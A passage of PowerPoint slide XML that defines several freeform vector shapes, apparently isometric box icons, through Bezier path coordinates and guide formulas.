                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="351" y="424"/>
                  <a:pt x="351" y="424"/>
                  <a:pt x="351" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="417"/>
                  <a:pt x="379" y="422"/>
                  <a:pt x="386" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="393" y="447"/>
                  <a:pt x="388" y="462"/>
                  <a:pt x="376" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="513"/>
                  <a:pt x="298" y="513"/>
                  <a:pt x="298" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="515"/>
                  <a:pt x="289" y="516"/>
                  <a:pt x="285" y="51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4" name="Freeform 754">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900E7262-CE3F-4451-8FE0-DB14AD97EC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3552098" y="4858382"/>
            <a:ext cx="269068" cy="141868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 285 w 579"/>
              <a:gd name="T1" fmla="*/ 312 h 312"/>
              <a:gd name="T2" fmla="*/ 274 w 579"/>
              <a:gd name="T3" fmla="*/ 309 h 312"/>
              <a:gd name="T4" fmla="*/ 15 w 579"/>
              <a:gd name="T5" fmla="*/ 180 h 312"/>
              <a:gd name="T6" fmla="*/ 1 w 579"/>
              <a:gd name="T7" fmla="*/ 157 h 312"/>
              <a:gd name="T8" fmla="*/ 15 w 579"/>
              <a:gd name="T9" fmla="*/ 134 h 312"/>
              <a:gd name="T10" fmla="*/ 278 w 579"/>
              <a:gd name="T11" fmla="*/ 3 h 312"/>
              <a:gd name="T12" fmla="*/ 300 w 579"/>
              <a:gd name="T13" fmla="*/ 3 h 312"/>
              <a:gd name="T14" fmla="*/ 564 w 579"/>
              <a:gd name="T15" fmla="*/ 122 h 312"/>
              <a:gd name="T16" fmla="*/ 579 w 579"/>
              <a:gd name="T17" fmla="*/ 145 h 312"/>
              <a:gd name="T18" fmla="*/ 565 w 579"/>
              <a:gd name="T19" fmla="*/ 169 h 312"/>
              <a:gd name="T20" fmla="*/ 297 w 579"/>
              <a:gd name="T21" fmla="*/ 309 h 312"/>
              <a:gd name="T22" fmla="*/ 285 w 579"/>
              <a:gd name="T23" fmla="*/ 312 h 312"/>
              <a:gd name="T24" fmla="*/ 85 w 579"/>
              <a:gd name="T25" fmla="*/ 157 h 312"/>
              <a:gd name="T26" fmla="*/ 285 w 579"/>
              <a:gd name="T27" fmla="*/ 257 h 312"/>
              <a:gd name="T28" fmla="*/ 494 w 579"/>
              <a:gd name="T29" fmla="*/ 148 h 312"/>
              <a:gd name="T30" fmla="*/ 290 w 579"/>
              <a:gd name="T31" fmla="*/ 55 h 312"/>
              <a:gd name="T32" fmla="*/ 85 w 579"/>
              <a:gd name="T33" fmla="*/ 157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79" h="312">
                <a:moveTo>
                  <a:pt x="285" y="312"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="312"/>
                  <a:pt x="277" y="311"/>
                  <a:pt x="274" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="180"/>
                  <a:pt x="15" y="180"/>
                  <a:pt x="15" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="176"/>
                  <a:pt x="0" y="167"/>
                  <a:pt x="1" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="147"/>
                  <a:pt x="6" y="138"/>
                  <a:pt x="15" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="3"/>
                  <a:pt x="278" y="3"/>
                  <a:pt x="278" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="0"/>
                  <a:pt x="293" y="0"/>
                  <a:pt x="300" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="564" y="122"/>
                  <a:pt x="564" y="122"/>
                  <a:pt x="564" y="122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="573" y="126"/>
                  <a:pt x="579" y="135"/>
                  <a:pt x="579" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="579" y="155"/>
                  <a:pt x="574" y="164"/>
                  <a:pt x="565" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="309"/>
                  <a:pt x="297" y="309"/>
                  <a:pt x="297" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="311"/>
                  <a:pt x="289" y="312"/>
                  <a:pt x="285" y="312"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="85" y="157"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="257"/>
                  <a:pt x="285" y="257"/>
                  <a:pt x="285" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="494" y="148"/>
                  <a:pt x="494" y="148"/>
                  <a:pt x="494" y="148"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="55"/>
                  <a:pt x="290" y="55"/>
                  <a:pt x="290" y="55"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85" y="15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5" name="Freeform 756">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF88FF9D-83C6-42F9-9A2C-05C2367DEC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3381380" y="4913655"/>
            <a:ext cx="79793" cy="202668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 29 w 170"/>
              <a:gd name="T1" fmla="*/ 441 h 441"/>
              <a:gd name="T2" fmla="*/ 6 w 170"/>
              <a:gd name="T3" fmla="*/ 428 h 441"/>
              <a:gd name="T4" fmla="*/ 17 w 170"/>
              <a:gd name="T5" fmla="*/ 392 h 441"/>
              <a:gd name="T6" fmla="*/ 119 w 170"/>
              <a:gd name="T7" fmla="*/ 336 h 441"/>
              <a:gd name="T8" fmla="*/ 119 w 170"/>
              <a:gd name="T9" fmla="*/ 26 h 441"/>
              <a:gd name="T10" fmla="*/ 144 w 170"/>
              <a:gd name="T11" fmla="*/ 0 h 441"/>
              <a:gd name="T12" fmla="*/ 170 w 170"/>
              <a:gd name="T13" fmla="*/ 26 h 441"/>
              <a:gd name="T14" fmla="*/ 170 w 170"/>
              <a:gd name="T15" fmla="*/ 351 h 441"/>
              <a:gd name="T16" fmla="*/ 157 w 170"/>
              <a:gd name="T17" fmla="*/ 374 h 441"/>
              <a:gd name="T18" fmla="*/ 42 w 170"/>
              <a:gd name="T19" fmla="*/ 438 h 441"/>
              <a:gd name="T20" fmla="*/ 29 w 170"/>
              <a:gd name="T21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0" h="441">
                <a:moveTo>
                  <a:pt x="29" y="441"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="441"/>
                  <a:pt x="11" y="436"/>
                  <a:pt x="6" y="428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="415"/>
                  <a:pt x="4" y="399"/>
                  <a:pt x="17" y="392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336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9" y="12"/>
                  <a:pt x="130" y="0"/>
                  <a:pt x="144" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="0"/>
                  <a:pt x="170" y="12"/>
                  <a:pt x="170" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="170" y="351"/>
                  <a:pt x="170" y="351"/>
                  <a:pt x="170" y="351"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="170" y="360"/>
                  <a:pt x="165" y="369"/>
                  <a:pt x="157" y="374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="438"/>
                  <a:pt x="42" y="438"/>
                  <a:pt x="42" y="438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="440"/>
                  <a:pt x="33" y="441"/>
                  <a:pt x="29" y="4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6" name="Freeform 757">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17BEA48-8DC7-4222-82BA-5768501C7F44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3193961" y="4917339"/>
            <a:ext cx="179997" cy="237676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 284 w 392"/>
              <a:gd name="T1" fmla="*/ 516 h 516"/>
              <a:gd name="T2" fmla="*/ 271 w 392"/>
              <a:gd name="T3" fmla="*/ 513 h 516"/>
              <a:gd name="T4" fmla="*/ 14 w 392"/>
              <a:gd name="T5" fmla="*/ 364 h 516"/>
              <a:gd name="T6" fmla="*/ 2 w 392"/>
              <a:gd name="T7" fmla="*/ 342 h 516"/>
              <a:gd name="T8" fmla="*/ 0 w 392"/>
              <a:gd name="T9" fmla="*/ 26 h 516"/>
              <a:gd name="T10" fmla="*/ 25 w 392"/>
              <a:gd name="T11" fmla="*/ 0 h 516"/>
              <a:gd name="T12" fmla="*/ 51 w 392"/>
              <a:gd name="T13" fmla="*/ 26 h 516"/>
              <a:gd name="T14" fmla="*/ 53 w 392"/>
              <a:gd name="T15" fmla="*/ 327 h 516"/>
              <a:gd name="T16" fmla="*/ 285 w 392"/>
              <a:gd name="T17" fmla="*/ 460 h 516"/>
              <a:gd name="T18" fmla="*/ 350 w 392"/>
              <a:gd name="T19" fmla="*/ 424 h 516"/>
              <a:gd name="T20" fmla="*/ 385 w 392"/>
              <a:gd name="T21" fmla="*/ 434 h 516"/>
              <a:gd name="T22" fmla="*/ 375 w 392"/>
              <a:gd name="T23" fmla="*/ 469 h 516"/>
              <a:gd name="T24" fmla="*/ 297 w 392"/>
              <a:gd name="T25" fmla="*/ 513 h 516"/>
              <a:gd name="T26" fmla="*/ 284 w 392"/>
              <a:gd name="T2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2" h="516">
                <a:moveTo>
                  <a:pt x="284" y="516"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="280" y="516"/>
                  <a:pt x="275" y="515"/>
                  <a:pt x="271" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="364"/>
                  <a:pt x="14" y="364"/>
                  <a:pt x="14" y="364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="360"/>
                  <a:pt x="2" y="351"/>
                  <a:pt x="2" y="34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1" y="0"/>
                  <a:pt x="25" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="0"/>
                  <a:pt x="51" y="12"/>
                  <a:pt x="51" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="327"/>
                  <a:pt x="53" y="327"/>
                  <a:pt x="53" y="327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="350" y="424"/>
                  <a:pt x="350" y="424"/>
                  <a:pt x="350" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="362" y="417"/>
                  <a:pt x="378" y="422"/>
                  <a:pt x="385" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="392" y="447"/>
                  <a:pt x="387" y="462"/>
                  <a:pt x="375" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="513"/>
                  <a:pt x="297" y="513"/>
                  <a:pt x="297" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="515"/>
                  <a:pt x="289" y="516"/>
                  <a:pt x="284" y="51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7" name="Freeform 758">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3CFEA0-50D9-4542-A3EB-146AED52708E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3193961" y="4858382"/>
            <a:ext cx="267210" cy="141868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 284 w 579"/>
              <a:gd name="T1" fmla="*/ 312 h 312"/>
              <a:gd name="T2" fmla="*/ 273 w 579"/>
              <a:gd name="T3" fmla="*/ 309 h 312"/>
              <a:gd name="T4" fmla="*/ 14 w 579"/>
              <a:gd name="T5" fmla="*/ 180 h 312"/>
              <a:gd name="T6" fmla="*/ 0 w 579"/>
              <a:gd name="T7" fmla="*/ 157 h 312"/>
              <a:gd name="T8" fmla="*/ 14 w 579"/>
              <a:gd name="T9" fmla="*/ 134 h 312"/>
              <a:gd name="T10" fmla="*/ 277 w 579"/>
              <a:gd name="T11" fmla="*/ 3 h 312"/>
              <a:gd name="T12" fmla="*/ 300 w 579"/>
              <a:gd name="T13" fmla="*/ 3 h 312"/>
              <a:gd name="T14" fmla="*/ 563 w 579"/>
              <a:gd name="T15" fmla="*/ 122 h 312"/>
              <a:gd name="T16" fmla="*/ 578 w 579"/>
              <a:gd name="T17" fmla="*/ 145 h 312"/>
              <a:gd name="T18" fmla="*/ 564 w 579"/>
              <a:gd name="T19" fmla="*/ 169 h 312"/>
              <a:gd name="T20" fmla="*/ 296 w 579"/>
              <a:gd name="T21" fmla="*/ 309 h 312"/>
              <a:gd name="T22" fmla="*/ 284 w 579"/>
              <a:gd name="T23" fmla="*/ 312 h 312"/>
              <a:gd name="T24" fmla="*/ 84 w 579"/>
              <a:gd name="T25" fmla="*/ 157 h 312"/>
              <a:gd name="T26" fmla="*/ 284 w 579"/>
              <a:gd name="T27" fmla="*/ 257 h 312"/>
              <a:gd name="T28" fmla="*/ 493 w 579"/>
              <a:gd name="T29" fmla="*/ 148 h 312"/>
              <a:gd name="T30" fmla="*/ 289 w 579"/>
              <a:gd name="T31" fmla="*/ 55 h 312"/>
              <a:gd name="T32" fmla="*/ 84 w 579"/>
              <a:gd name="T33" fmla="*/ 157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79" h="312">
                <a:moveTo>
                  <a:pt x="284" y="312"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="280" y="312"/>
                  <a:pt x="276" y="311"/>
                  <a:pt x="273" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="180"/>
                  <a:pt x="14" y="180"/>
                  <a:pt x="14" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="176"/>
                  <a:pt x="0" y="167"/>
                  <a:pt x="0" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="147"/>
                  <a:pt x="5" y="138"/>
                  <a:pt x="14" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="3"/>
                  <a:pt x="277" y="3"/>
                  <a:pt x="277" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="284" y="0"/>
                  <a:pt x="293" y="0"/>
                  <a:pt x="300" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="563" y="122"/>
                  <a:pt x="563" y="122"/>
                  <a:pt x="563" y="122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="572" y="126"/>
                  <a:pt x="578" y="135"/>
                  <a:pt x="578" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="579" y="155"/>
                  <a:pt x="573" y="164"/>
                  <a:pt x="564" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="296" y="309"/>
                  <a:pt x="296" y="309"/>
                  <a:pt x="296" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="311"/>
                  <a:pt x="288" y="312"/>
                  <a:pt x="284" y="312"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="157"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="284" y="257"/>
                  <a:pt x="284" y="257"/>
                  <a:pt x="284" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="493" y="148"/>
                  <a:pt x="493" y="148"/>
                  <a:pt x="493" y="148"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="55"/>
                  <a:pt x="289" y="55"/>
                  <a:pt x="289" y="55"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="15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8" name="Freeform 759">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D129D0A8-6BCA-4F9C-A0CB-F704A947C488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3312721" y="4976299"/>
            <a:ext cx="24125" cy="178719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 26 w 52"/>
              <a:gd name="T1" fmla="*/ 387 h 387"/>
              <a:gd name="T2" fmla="*/ 0 w 52"/>
              <a:gd name="T3" fmla="*/ 361 h 387"/>
              <a:gd name="T4" fmla="*/ 0 w 52"/>
              <a:gd name="T5" fmla="*/ 26 h 387"/>
              <a:gd name="T6" fmla="*/ 26 w 52"/>
              <a:gd name="T7" fmla="*/ 0 h 387"/>
              <a:gd name="T8" fmla="*/ 52 w 52"/>
              <a:gd name="T9" fmla="*/ 26 h 387"/>
              <a:gd name="T10" fmla="*/ 52 w 52"/>
              <a:gd name="T11" fmla="*/ 361 h 387"/>
              <a:gd name="T12" fmla="*/ 26 w 52"/>
              <a:gd name="T13" fmla="*/ 387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387">
                <a:moveTo>
                  <a:pt x="26" y="387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="387"/>
                  <a:pt x="0" y="375"/>
                  <a:pt x="0" y="361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1"/>
                  <a:pt x="12" y="0"/>
                  <a:pt x="26" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="0"/>
                  <a:pt x="52" y="11"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="361"/>
                  <a:pt x="52" y="361"/>
                  <a:pt x="52" y="361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="375"/>
                  <a:pt x="41" y="387"/>
                  <a:pt x="26" y="38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399" name="Freeform 760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE6E32C-28A1-4FDD-AD5A-DAF7566982E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4099509" y="4913655"/>
            <a:ext cx="79793" cy="202668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 30 w 171"/>
              <a:gd name="T1" fmla="*/ 441 h 441"/>
              <a:gd name="T2" fmla="*/ 7 w 171"/>
              <a:gd name="T3" fmla="*/ 428 h 441"/>
              <a:gd name="T4" fmla="*/ 17 w 171"/>
              <a:gd name="T5" fmla="*/ 392 h 441"/>
              <a:gd name="T6" fmla="*/ 119 w 171"/>
              <a:gd name="T7" fmla="*/ 336 h 441"/>
              <a:gd name="T8" fmla="*/ 119 w 171"/>
              <a:gd name="T9" fmla="*/ 26 h 441"/>
              <a:gd name="T10" fmla="*/ 145 w 171"/>
              <a:gd name="T11" fmla="*/ 0 h 441"/>
              <a:gd name="T12" fmla="*/ 171 w 171"/>
              <a:gd name="T13" fmla="*/ 26 h 441"/>
              <a:gd name="T14" fmla="*/ 171 w 171"/>
              <a:gd name="T15" fmla="*/ 351 h 441"/>
              <a:gd name="T16" fmla="*/ 158 w 171"/>
              <a:gd name="T17" fmla="*/ 374 h 441"/>
              <a:gd name="T18" fmla="*/ 42 w 171"/>
              <a:gd name="T19" fmla="*/ 438 h 441"/>
              <a:gd name="T20" fmla="*/ 30 w 171"/>
              <a:gd name="T21" fmla="*/ 441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71" h="441">
                <a:moveTo>
                  <a:pt x="30" y="441"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="441"/>
                  <a:pt x="12" y="436"/>
                  <a:pt x="7" y="428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="415"/>
                  <a:pt x="5" y="399"/>
                  <a:pt x="17" y="392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="26"/>
                  <a:pt x="119" y="26"/>
                  <a:pt x="119" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="12"/>
                  <a:pt x="131" y="0"/>
                  <a:pt x="145" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="0"/>
                  <a:pt x="171" y="12"/>
                  <a:pt x="171" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="351"/>
                  <a:pt x="171" y="351"/>
                  <a:pt x="171" y="351"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="360"/>
                  <a:pt x="166" y="369"/>
                  <a:pt x="158" y="374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="438"/>
                  <a:pt x="42" y="438"/>
                  <a:pt x="42" y="438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="440"/>
                  <a:pt x="34" y="441"/>
                  <a:pt x="30" y="44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400" name="Freeform 761">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A7298F-D4E7-4DAE-8F76-FE44DA4B685B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3910234" y="4917339"/>
            <a:ext cx="181853" cy="237676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 285 w 392"/>
              <a:gd name="T1" fmla="*/ 516 h 516"/>
              <a:gd name="T2" fmla="*/ 272 w 392"/>
              <a:gd name="T3" fmla="*/ 513 h 516"/>
              <a:gd name="T4" fmla="*/ 15 w 392"/>
              <a:gd name="T5" fmla="*/ 364 h 516"/>
              <a:gd name="T6" fmla="*/ 2 w 392"/>
              <a:gd name="T7" fmla="*/ 342 h 516"/>
              <a:gd name="T8" fmla="*/ 0 w 392"/>
              <a:gd name="T9" fmla="*/ 26 h 516"/>
              <a:gd name="T10" fmla="*/ 26 w 392"/>
              <a:gd name="T11" fmla="*/ 0 h 516"/>
              <a:gd name="T12" fmla="*/ 52 w 392"/>
              <a:gd name="T13" fmla="*/ 26 h 516"/>
              <a:gd name="T14" fmla="*/ 54 w 392"/>
              <a:gd name="T15" fmla="*/ 327 h 516"/>
              <a:gd name="T16" fmla="*/ 285 w 392"/>
              <a:gd name="T17" fmla="*/ 460 h 516"/>
              <a:gd name="T18" fmla="*/ 350 w 392"/>
              <a:gd name="T19" fmla="*/ 424 h 516"/>
              <a:gd name="T20" fmla="*/ 386 w 392"/>
              <a:gd name="T21" fmla="*/ 434 h 516"/>
              <a:gd name="T22" fmla="*/ 375 w 392"/>
              <a:gd name="T23" fmla="*/ 469 h 516"/>
              <a:gd name="T24" fmla="*/ 297 w 392"/>
              <a:gd name="T25" fmla="*/ 513 h 516"/>
              <a:gd name="T26" fmla="*/ 285 w 392"/>
              <a:gd name="T2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2" h="516">
                <a:moveTo>
                  <a:pt x="285" y="516"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="280" y="516"/>
                  <a:pt x="276" y="515"/>
                  <a:pt x="272" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="364"/>
                  <a:pt x="15" y="364"/>
                  <a:pt x="15" y="364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="360"/>
                  <a:pt x="2" y="351"/>
                  <a:pt x="2" y="342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2"/>
                  <a:pt x="12" y="0"/>
                  <a:pt x="26" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="0"/>
                  <a:pt x="52" y="12"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="327"/>
                  <a:pt x="54" y="327"/>
                  <a:pt x="54" y="327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                  <a:pt x="285" y="460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="350" y="424"/>
                  <a:pt x="350" y="424"/>
                  <a:pt x="350" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="417"/>
                  <a:pt x="379" y="422"/>
                  <a:pt x="386" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="392" y="447"/>
                  <a:pt x="388" y="462"/>
                  <a:pt x="375" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="513"/>
                  <a:pt x="297" y="513"/>
                  <a:pt x="297" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="515"/>
                  <a:pt x="289" y="516"/>
                  <a:pt x="285" y="51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401" name="Freeform 762">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C1E174-C8D9-420E-A222-BD921A649251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3910234" y="4858382"/>
            <a:ext cx="269068" cy="141868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 285 w 579"/>
              <a:gd name="T1" fmla="*/ 312 h 312"/>
              <a:gd name="T2" fmla="*/ 273 w 579"/>
              <a:gd name="T3" fmla="*/ 309 h 312"/>
              <a:gd name="T4" fmla="*/ 15 w 579"/>
              <a:gd name="T5" fmla="*/ 180 h 312"/>
              <a:gd name="T6" fmla="*/ 0 w 579"/>
              <a:gd name="T7" fmla="*/ 157 h 312"/>
              <a:gd name="T8" fmla="*/ 15 w 579"/>
              <a:gd name="T9" fmla="*/ 134 h 312"/>
              <a:gd name="T10" fmla="*/ 278 w 579"/>
              <a:gd name="T11" fmla="*/ 3 h 312"/>
              <a:gd name="T12" fmla="*/ 300 w 579"/>
              <a:gd name="T13" fmla="*/ 3 h 312"/>
              <a:gd name="T14" fmla="*/ 564 w 579"/>
              <a:gd name="T15" fmla="*/ 122 h 312"/>
              <a:gd name="T16" fmla="*/ 579 w 579"/>
              <a:gd name="T17" fmla="*/ 145 h 312"/>
              <a:gd name="T18" fmla="*/ 565 w 579"/>
